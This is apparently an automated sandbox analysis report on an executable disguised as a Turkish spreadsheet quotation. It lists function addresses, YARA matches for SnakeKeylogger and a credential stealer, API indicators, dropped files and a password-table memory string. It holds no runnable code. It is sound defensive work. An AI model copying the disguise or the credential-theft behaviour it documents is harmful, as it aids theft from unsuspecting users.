Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05924D98	14_2_05924D98
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05924D89	14_2_05924D89
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05922DA8	14_2_05922DA8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05920DF0	14_2_05920DF0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05920DE0	14_2_05920DE0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05927508	14_2_05927508
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592EC90	14_2_0592EC90
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592D497	14_2_0592D497
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592EC81	14_2_0592EC81
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05922488	14_2_05922488
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592BCB2	14_2_0592BCB2
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592D4A8	14_2_0592D4A8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059204D0	14_2_059204D0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592A4D8	14_2_0592A4D8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592BCC0	14_2_0592BCC0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059204C0	14_2_059204C0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592A4C8	14_2_0592A4C8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05928CF0	14_2_05928CF0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059274F8	14_2_059274F8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05928CE1	14_2_05928CE1
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05922477	14_2_05922477
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05924478	14_2_05924478
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05924467	14_2_05924467
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592E7BA	14_2_0592E7BA
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592CFD0	14_2_0592CFD0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05923FD8	14_2_05923FD8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592E7C8	14_2_0592E7C8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05921FF8	14_2_05921FF8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592B7F8	14_2_0592B7F8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05929FFF	14_2_05929FFF
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592CFE0	14_2_0592CFE0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05923FE8	14_2_05923FE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05921FE8	14_2_05921FE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592B7E8	14_2_0592B7E8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05921710	14_2_05921710
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05921701	14_2_05921701
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05927E98	14_2_05927E98
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05929680	14_2_05929680
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05927E88	14_2_05927E88
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059266B0	14_2_059266B0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059256B8	14_2_059256B8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059236B9	14_2_059236B9
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059266A0	14_2_059266A0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059256A9	14_2_059256A9
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059236C8	14_2_059236C8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592F610	14_2_0592F610
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592DE38	14_2_0592DE38
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592F620	14_2_0592F620
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592DE28	14_2_0592DE28
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592C650	14_2_0592C650
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592AE58	14_2_0592AE58
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592C641	14_2_0592C641
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592AE68	14_2_0592AE68
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592966F	14_2_0592966F
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592C188	14_2_0592C188
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592A98F	14_2_0592A98F
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059291B8	14_2_059291B8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592A9A0	14_2_0592A9A0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059291A7	14_2_059291A7
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059279D0	14_2_059279D0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059261D9	14_2_059261D9
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059279C0	14_2_059279C0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05922918	14_2_05922918
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592290A	14_2_0592290A
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05924908	14_2_05924908
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05920950	14_2_05920950
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592F158	14_2_0592F158
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592F147	14_2_0592F147
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592D970	14_2_0592D970
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592C178	14_2_0592C178
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05920960	14_2_05920960
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592D960	14_2_0592D960
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_059248F9	14_2_059248F9
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592A010	14_2_0592A010
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05928819	14_2_05928819
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05920006	14_2_05920006
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05928828	14_2_05928828
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592702F	14_2_0592702F
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05920040	14_2_05920040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05927040	14_2_05927040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592CB16	14_2_0592CB16
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592CB18	14_2_0592CB18
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592B31F	14_2_0592B31F
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592E300	14_2_0592E300
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592B330	14_2_0592B330
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05925B37	14_2_05925B37
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05929B38	14_2_05929B38
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05928350	14_2_05928350
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05923B58	14_2_05923B58
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05921B58	14_2_05921B58
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05925B48	14_2_05925B48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05929B48	14_2_05929B48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05923B48	14_2_05923B48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05926B78	14_2_05926B78
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05928360	14_2_05928360
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05926B6A	14_2_05926B6A
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05921B68	14_2_05921B68
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05921280	14_2_05921280
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592FAD7	14_2_0592FAD7
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592FAE8	14_2_0592FAE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592E2EF	14_2_0592E2EF
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05925218	14_2_05925218
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05923238	14_2_05923238
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05923227	14_2_05923227
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_05925228	14_2_05925228
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_0592126F	14_2_0592126F

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000000.1331444675.000000000109A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamevamE.exe8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1382075944.0000000007B80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowe vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1382075944.0000000007BE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevamE.exe8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1382768826.0000000007CF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.00000000045CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1376138734.000000000165E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1377186980.0000000003341000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3797023101.0000000000444000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3797646309.0000000000BA7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Binary or memory string: OriginalFilenamevamE.exe8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YzkHZRBcm.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs	Security API names: _0020.SetAccessControl
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs	Security API names: _0020.AddAccessRule
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, FcY9ehqsfh4aVO4DAb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, FcY9ehqsfh4aVO4DAb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs	Security API names: _0020.SetAccessControl
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs	Security API names: _0020.AddAccessRule
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs	Security API names: _0020.SetAccessControl
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs	Security API names: _0020.AddAccessRule
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, FcY9ehqsfh4aVO4DAb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4300:120:WilError_03
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDGYsLKdk

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File created: C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp

Jump to behavior

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000003191000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000315D000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000319D000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000316C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000314D000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003278000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000032B8000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000032AC000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

ReversingLabs: Detection: 52%

